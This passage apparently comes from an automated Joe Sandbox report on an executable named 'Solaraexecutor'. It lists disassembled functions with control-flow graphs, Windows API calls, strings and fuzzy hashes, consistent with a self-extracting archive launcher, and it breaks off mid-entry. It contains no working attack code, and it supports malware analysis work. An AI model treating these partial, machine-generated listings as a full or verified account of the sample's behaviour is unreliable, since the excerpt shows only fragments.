                                                      • Opcode Fuzzy Hash: 6be21bd273dbf8aba5e08e8e0410d4ddca2b0a157fd557ef2e125acfb50e004a
                                                      • Instruction Fuzzy Hash: 8132D171900228DBDF25EF68E841AEE77A5FF29308F44016AF94697281E7B1DD85CB70

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00D3B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D3B579
                                                        • Part of subcall function 00D3B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D3B58A
                                                        • Part of subcall function 00D3B568: IsDialogMessageW.USER32(00010424,?), ref: 00D3B59E
                                                        • Part of subcall function 00D3B568: TranslateMessage.USER32(?), ref: 00D3B5AC
                                                        • Part of subcall function 00D3B568: DispatchMessageW.USER32(?), ref: 00D3B5B6
                                                      • GetDlgItem.USER32(00000068,00D7FCB8), ref: 00D3D4E8
                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,00D3AF07,00000001,?,?,00D3B7B9,00D5506C,00D7FCB8,00D7FCB8,00001000,00000000,00000000), ref: 00D3D510
                                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00D3D51B
                                                      • SendMessageW.USER32(00000000,000000C2,00000000,00D535F4), ref: 00D3D529
                                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D3D53F
                                                      • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00D3D559
                                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D3D59D
                                                      • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00D3D5AB
                                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D3D5BA
                                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D3D5E1
                                                      • SendMessageW.USER32(00000000,000000C2,00000000,00D543F4), ref: 00D3D5F0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                      • String ID: \
                                                      • API String ID: 3569833718-2967466578
                                                      • Opcode ID: cd876f6e64b77417add20e1134da5f66bb53126704e2edfd526a4e4888b4a2ed
                                                      • Instruction ID: 22da2ad01e64e27a55e18ffaa8a3c5ba2ed687e0482a228abe51d6f979271ba1
                                                      • Opcode Fuzzy Hash: cd876f6e64b77417add20e1134da5f66bb53126704e2edfd526a4e4888b4a2ed
                                                      • Instruction Fuzzy Hash: AD31A171145742AFE301DF20AC4AFAB7FACEB86B15F000508F555D62D0EB659A088B77

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 836 d3d78f-d3d7a7 call d3ec50 839 d3d9e8-d3d9f0 836->839 840 d3d7ad-d3d7b9 call d43e13 836->840 840->839 843 d3d7bf-d3d7e7 call d3fff0 840->843 846 d3d7f1-d3d7ff 843->846 847 d3d7e9 843->847 848 d3d812-d3d818 846->848 849 d3d801-d3d804 846->849 847->846 851 d3d85b-d3d85e 848->851 850 d3d808-d3d80e 849->850 853 d3d810 850->853 854 d3d837-d3d844 850->854 851->850 852 d3d860-d3d866 851->852 857 d3d868-d3d86b 852->857 858 d3d86d-d3d86f 852->858 859 d3d822-d3d82c 853->859 855 d3d9c0-d3d9c2 854->855 856 d3d84a-d3d84e 854->856 862 d3d9c6 855->862 856->862 863 d3d854-d3d859 856->863 857->858 864 d3d882-d3d898 call d2b92d 857->864 858->864 865 d3d871-d3d878 858->865 860 d3d81a-d3d820 859->860 861 d3d82e 859->861 860->859 866 d3d830-d3d833 860->866 861->854 869 d3d9cf 862->869 863->851 872 d3d8b1-d3d8bc call d2a231 864->872 873 d3d89a-d3d8a7 call d31fbb 864->873 865->864 867 d3d87a 865->867 866->854 867->864 871 d3d9d6-d3d9d8 869->871 876 d3d9e7 871->876 877 d3d9da-d3d9dc 871->877 882 d3d8d9-d3d8e6 ShellExecuteExW 872->882 883 d3d8be-d3d8d5 call d2b6c4 872->883 873->872 881 d3d8a9 873->881 876->839 877->876 880 d3d9de-d3d9e1 ShowWindow 877->880 880->876 881->872 882->876 885 d3d8ec-d3d8f9 882->885 883->882 887 d3d8fb-d3d902 885->887 888 d3d90c-d3d90e 885->888 887->888 889 d3d904-d3d90a 887->889 890 d3d910-d3d919 888->890 891 d3d925-d3d944 call d3dc3b 888->891 889->888 892 d3d97b-d3d987 CloseHandle 889->892 890->891 897 d3d91b-d3d923 ShowWindow 890->897 891->892 905 d3d946-d3d94e 891->905 895 d3d989-d3d996 call d31fbb 892->895 896 d3d998-d3d9a6 892->896 895->869 895->896 896->871 898 d3d9a8-d3d9aa 896->898 897->891 898->871 901 d3d9ac-d3d9b2 898->901 901->871 904 d3d9b4-d3d9be 901->904 904->871 905->892 906 d3d950-d3d961 GetExitCodeProcess 905->906 906->892 907 d3d963-d3d96d 906->907 908 d3d974 907->908 909 d3d96f 907->909 908->892 909->908
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00D3D7AE
                                                      • ShellExecuteExW.SHELL32(?), ref: 00D3D8DE
                                                      • ShowWindow.USER32(?,00000000), ref: 00D3D91D
                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00D3D959
                                                      • CloseHandle.KERNEL32(?), ref: 00D3D97F
                                                      • ShowWindow.USER32(?,00000001), ref: 00D3D9E1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                      • String ID: .exe$.inf
                                                      • API String ID: 36480843-3750412487
                                                      • Opcode ID: 7f1875a33b3f01f5e2f6563e5f6f7e9b220c6218a6f1c3198aacc2193ba831db
                                                      • Instruction ID: 976e260b4005d20bc82939d1b284bd4113f01a357b7f67e1f566fa6ee621b160
                                                      • Opcode Fuzzy Hash: 7f1875a33b3f01f5e2f6563e5f6f7e9b220c6218a6f1c3198aacc2193ba831db
                                                      • Instruction Fuzzy Hash: 8051B2754043809ADB319F24B844BABBBE6AF41744F0C081EF9C5D7291E7B19A88CF72

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 910 d4a95b-d4a974 911 d4a976-d4a986 call d4ef4c 910->911 912 d4a98a-d4a98f 910->912 911->912 919 d4a988 911->919 913 d4a991-d4a999 912->913 914 d4a99c-d4a9c0 MultiByteToWideChar 912->914 913->914 917 d4a9c6-d4a9d2 914->917 918 d4ab53-d4ab66 call d3fbbc 914->918 920 d4a9d4-d4a9e5 917->920 921 d4aa26 917->921 919->912 924 d4aa04-d4aa15 call d48e06 920->924 925 d4a9e7-d4a9f6 call d52010 920->925 923 d4aa28-d4aa2a 921->923 927 d4aa30-d4aa43 MultiByteToWideChar 923->927 928 d4ab48 923->928 924->928 938 d4aa1b 924->938 925->928 937 d4a9fc-d4aa02 925->937 927->928 931 d4aa49-d4aa5b call d4af6c 927->931 932 d4ab4a-d4ab51 call d4abc3 928->932 939 d4aa60-d4aa64 931->939 932->918 941 d4aa21-d4aa24 937->941 938->941 939->928 942 d4aa6a-d4aa71 939->942 941->923 943 d4aa73-d4aa78 942->943 944 d4aaab-d4aab7 942->944 943->932 945 d4aa7e-d4aa80 943->945 946 d4ab03 944->946 947 d4aab9-d4aaca 944->947 945->928 948 d4aa86-d4aaa0 call d4af6c 945->948 949 d4ab05-d4ab07 946->949 950 d4aae5-d4aaf6 call d48e06 947->950 951 d4aacc-d4aadb call d52010 947->951 948->932 965 d4aaa6 948->965 955 d4ab41-d4ab47 call d4abc3 949->955 956 d4ab09-d4ab22 call d4af6c 949->956 950->955 964 d4aaf8 950->964 951->955 962 d4aadd-d4aae3 951->962 955->928 956->955 968 d4ab24-d4ab2b 956->968 967 d4aafe-d4ab01 962->967 964->967 965->928 967->949 969 d4ab67-d4ab6d 968->969 970 d4ab2d-d4ab2e 968->970 971 d4ab2f-d4ab3f WideCharToMultiByte 969->971 970->971 971->955 972 d4ab6f-d4ab76 call d4abc3 971->972 972->932
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D45695,00D45695,?,?,?,00D4ABAC,00000001,00000001,2DE85006), ref: 00D4A9B5
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D4ABAC,00000001,00000001,2DE85006,?,?,?), ref: 00D4AA3B
                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D4AB35
                                                      • __freea.LIBCMT ref: 00D4AB42
                                                        • Part of subcall function 00D48E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D4CA2C,00000000,?,00D46CBE,?,00000008,?,00D491E0,?,?,?), ref: 00D48E38
                                                      • __freea.LIBCMT ref: 00D4AB4B
                                                      • __freea.LIBCMT ref: 00D4AB70
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1414292761-0
                                                      • Opcode ID: 2e0841239e4e5e2a3fc0aaf5f88d4d802d8fc1f696aaefa8030a6ef792cb80ce
                                                      • Instruction ID: 96430d06d43b7133f77cda31f5fcc004b4233188dbf25b377d7ddd893cd69001
                                                      • Opcode Fuzzy Hash: 2e0841239e4e5e2a3fc0aaf5f88d4d802d8fc1f696aaefa8030a6ef792cb80ce
                                                      • Instruction Fuzzy Hash: 0751C572650216AFDB258F68CC42EBFB7AAEF44750F194629FC04E6140EB34DC54D6B2

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 975 d43b72-d43b7c 976 d43bee-d43bf1 975->976 977 d43bf3 976->977 978 d43b7e-d43b8c 976->978 979 d43bf5-d43bf9 977->979 980 d43b95-d43bb1 LoadLibraryExW 978->980 981 d43b8e-d43b91 978->981 984 d43bb3-d43bbc GetLastError 980->984 985 d43bfa-d43c00 980->985 982 d43b93 981->982 983 d43c09-d43c0b 981->983 987 d43beb 982->987 983->979 988 d43be6-d43be9 984->988 989 d43bbe-d43bd3 call d46088 984->989 985->983 986 d43c02-d43c03 FreeLibrary 985->986 986->983 987->976 988->987 989->988 992 d43bd5-d43be4 LoadLibraryExW 989->992 992->985 992->988
                                                      APIs
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00D43C35,?,?,00D82088,00000000,?,00D43D60,00000004,InitializeCriticalSectionEx,00D56394,InitializeCriticalSectionEx,00000000), ref: 00D43C03
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID: api-ms-
                                                      • API String ID: 3664257935-2084034818
                                                      • Opcode ID: 3312a45fee138475dcc7279b51f46b6c26b9825ec73dc84f7cf3901a9bd25ff9
                                                      • Instruction ID: 26c325ba5750d336b177dcb675989e5d49557d82e2b62db88725bbf28a8cc30e
                                                      • Opcode Fuzzy Hash: 3312a45fee138475dcc7279b51f46b6c26b9825ec73dc84f7cf3901a9bd25ff9
                                                      • Instruction Fuzzy Hash: 6611A032A45721ABDB228B6CDC41B5A77A4DF017B1F290220ED55EB290E770EF008AF5

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00D3081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D30836
                                                        • Part of subcall function 00D3081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D2F2D8,Crypt32.dll,00000000,00D2F35C,?,?,00D2F33E,?,?,?), ref: 00D30858
                                                      • OleInitialize.OLE32(00000000), ref: 00D3AC2F
                                                      • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D3AC66
                                                      • SHGetMalloc.SHELL32(00D68438), ref: 00D3AC70
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                      • String ID: riched20.dll$3Uo
                                                      • API String ID: 3498096277-2552611257
                                                      • Opcode ID: 725311273897e95c38085b50221cab4ffa5d1590dc425a529aaa3c984f8b84fb
                                                      • Instruction ID: eccef94d39e77d748b5d6a133adc61b45e0461501ea016353cc9ee9153e8627f
                                                      • Opcode Fuzzy Hash: 725311273897e95c38085b50221cab4ffa5d1590dc425a529aaa3c984f8b84fb
                                                      • Instruction Fuzzy Hash: 5BF0F9B1900209ABCB10AFA9D8499AFFFFCEF94B04F00415AA815E2241DBB456458BB1

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 997 d298e0-d29901 call d3ec50 1000 d29903-d29906 997->1000 1001 d2990c 997->1001 1000->1001 1002 d29908-d2990a 1000->1002 1003 d2990e-d2991f 1001->1003 1002->1003 1004 d29921 1003->1004 1005 d29927-d29931 1003->1005 1004->1005 1006 d29933 1005->1006 1007 d29936-d29943 call d26edb 1005->1007 1006->1007 1010 d29945 1007->1010 1011 d2994b-d2996a CreateFileW 1007->1011 1010->1011 1012 d299bb-d299bf 1011->1012 1013 d2996c-d2998e GetLastError call d2bb03 1011->1013 1014 d299c3-d299c6 1012->1014 1017 d299c8-d299cd 1013->1017 1019 d29990-d299b3 CreateFileW GetLastError 1013->1019 1014->1017 1018 d299d9-d299de 1014->1018 1017->1018 1020 d299cf 1017->1020 1021 d299e0-d299e3 1018->1021 1022 d299ff-d29a10 1018->1022 1019->1014 1023 d299b5-d299b9 1019->1023 1020->1018 1021->1022 1024 d299e5-d299f9 SetFileTime 1021->1024 1025 d29a12-d29a2a call d30602 1022->1025 1026 d29a2e-d29a39 1022->1026 1023->1014 1024->1022 1025->1026
                                                      APIs
                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00D27760,?,00000005,?,00000011), ref: 00D2995F
                                                      • GetLastError.KERNEL32(?,?,00D27760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D2996C
                                                      • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00D27760,?,00000005,?), ref: 00D299A2
                                                      • GetLastError.KERNEL32(?,?,00D27760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D299AA
                                                      • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00D27760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D299F9
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: File$CreateErrorLast$Time
                                                      • String ID:
                                                      • API String ID: 1999340476-0
                                                      • Opcode ID: 9c2b93cadf7ebc2736f02a5771aae8753706addf5d05bf359b396c1f41f00f6e
                                                      • Instruction ID: 42fe9821a4b0b381286684bc697ecb24dc15c74856dd696b9c8291853b15b81d
                                                      • Opcode Fuzzy Hash: 9c2b93cadf7ebc2736f02a5771aae8753706addf5d05bf359b396c1f41f00f6e
                                                      • Instruction Fuzzy Hash: 163123305443516FE7209F24EC46B9AFB94BB24338F141B1DF9A1922C0D3A5A994CFB0

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1056 d3b568-d3b581 PeekMessageW 1057 d3b583-d3b597 GetMessageW 1056->1057 1058 d3b5bc-d3b5be 1056->1058 1059 d3b599-d3b5a6 IsDialogMessageW 1057->1059 1060 d3b5a8-d3b5b6 TranslateMessage DispatchMessageW 1057->1060 1059->1058 1059->1060 1060->1058
                                                      APIs
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D3B579
                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D3B58A
                                                      • IsDialogMessageW.USER32(00010424,?), ref: 00D3B59E
                                                      • TranslateMessage.USER32(?), ref: 00D3B5AC
                                                      • DispatchMessageW.USER32(?), ref: 00D3B5B6
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: Message$DialogDispatchPeekTranslate
                                                      • String ID:
                                                      • API String ID: 1266772231-0
                                                      • Opcode ID: 32d6d644d0a8e46462f79abfef3aa8e22dcfb54cf6f1de5eecc5b4742fc075ad
                                                      • Instruction ID: f557dbe3d442d51e0c47c7b24a7d7f4b32b3cf56c8e8fd6d9a9c4fe2c7c80c88
                                                      • Opcode Fuzzy Hash: 32d6d644d0a8e46462f79abfef3aa8e22dcfb54cf6f1de5eecc5b4742fc075ad
                                                      • Instruction Fuzzy Hash: B7F0B771A1122AABCB20AFE6EC4CDDB7FACEE05AA17044515B909D2150EB74E605CBB0

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1061 d3abab-d3abca GetClassNameW 1062 d3abf2-d3abf4 1061->1062 1063 d3abcc-d3abe1 call d31fbb 1061->1063 1065 d3abf6-d3abf9 SHAutoComplete 1062->1065 1066 d3abff-d3ac01 1062->1066 1068 d3abe3-d3abef FindWindowExW 1063->1068 1069 d3abf1 1063->1069 1065->1066 1068->1069 1069->1062
                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000050), ref: 00D3ABC2
                                                      • SHAutoComplete.SHLWAPI(?,00000010), ref: 00D3ABF9
                                                        • Part of subcall function 00D31FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00D2C116,00000000,.exe,?,?,00000800,?,?,?,00D38E3C), ref: 00D31FD1
                                                      • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00D3ABE9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                      • String ID: EDIT
                                                      • API String ID: 4243998846-3080729518
                                                      • Opcode ID: 1c6705e48ee7133f3f7970eec769f91914280ce58515829cd51ae9a1b107955b
                                                      • Instruction ID: 70ff227f2a35e615114270cf9560d4546bb16c9798128c1e833b2dff3148550f
                                                      • Opcode Fuzzy Hash: 1c6705e48ee7133f3f7970eec769f91914280ce58515829cd51ae9a1b107955b
                                                      • Instruction Fuzzy Hash: 77F0823370032976DB205A289C09F9BB76C9F46F40F484011BE45E2280D760DA4587B6

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1070 d3dbde-d3dc09 call d3ec50 SetEnvironmentVariableW call d30371 1074 d3dc0e-d3dc12 1070->1074 1075 d3dc36-d3dc38 1074->1075 1076 d3dc14-d3dc18 1074->1076 1077 d3dc21-d3dc28 call d3048d 1076->1077 1080 d3dc1a-d3dc20 1077->1080 1081 d3dc2a-d3dc30 SetEnvironmentVariableW 1077->1081 1080->1077 1081->1075
                                                      APIs
                                                      • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00D3DBF4
                                                      • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D3DC30
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentVariable
                                                      • String ID: sfxcmd$sfxpar
                                                      • API String ID: 1431749950-3493335439
                                                      • Opcode ID: eaceedb403a814707f6900aaa69c9c0669183a7574f6cc3748f237ce1f361699
                                                      • Instruction ID: 4bd8285b63d37c72bf10036b8280c7a2054049fe104948f0be1091f5674d4cd7
                                                      • Opcode Fuzzy Hash: eaceedb403a814707f6900aaa69c9c0669183a7574f6cc3748f237ce1f361699
                                                      • Instruction Fuzzy Hash: 7DF0E5B2414724ABCF212FA5AC06FFA3F59EF08BC2F080411FD85D6195E6B0C944DAB0

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1082 d29785-d29791 1083 d29793-d2979b GetStdHandle 1082->1083 1084 d2979e-d297b5 ReadFile 1082->1084 1083->1084 1085 d29811 1084->1085 1086 d297b7-d297c0 call d298bc 1084->1086 1087 d29814-d29817 1085->1087 1090 d297c2-d297ca 1086->1090 1091 d297d9-d297dd 1086->1091 1090->1091 1094 d297cc 1090->1094 1092 d297ee-d297f2 1091->1092 1093 d297df-d297e8 GetLastError 1091->1093 1096 d297f4-d297fc 1092->1096 1097 d2980c-d2980f 1092->1097 1093->1092 1095 d297ea-d297ec 1093->1095 1098 d297cd-d297d7 call d29785 1094->1098 1095->1087 1096->1097 1099 d297fe-d29807 GetLastError 1096->1099 1097->1087 1098->1087 1099->1097 1101 d29809-d2980a 1099->1101 1101->1098
                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00D29795
                                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00D297AD
                                                      • GetLastError.KERNEL32 ref: 00D297DF
                                                      • GetLastError.KERNEL32 ref: 00D297FE
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
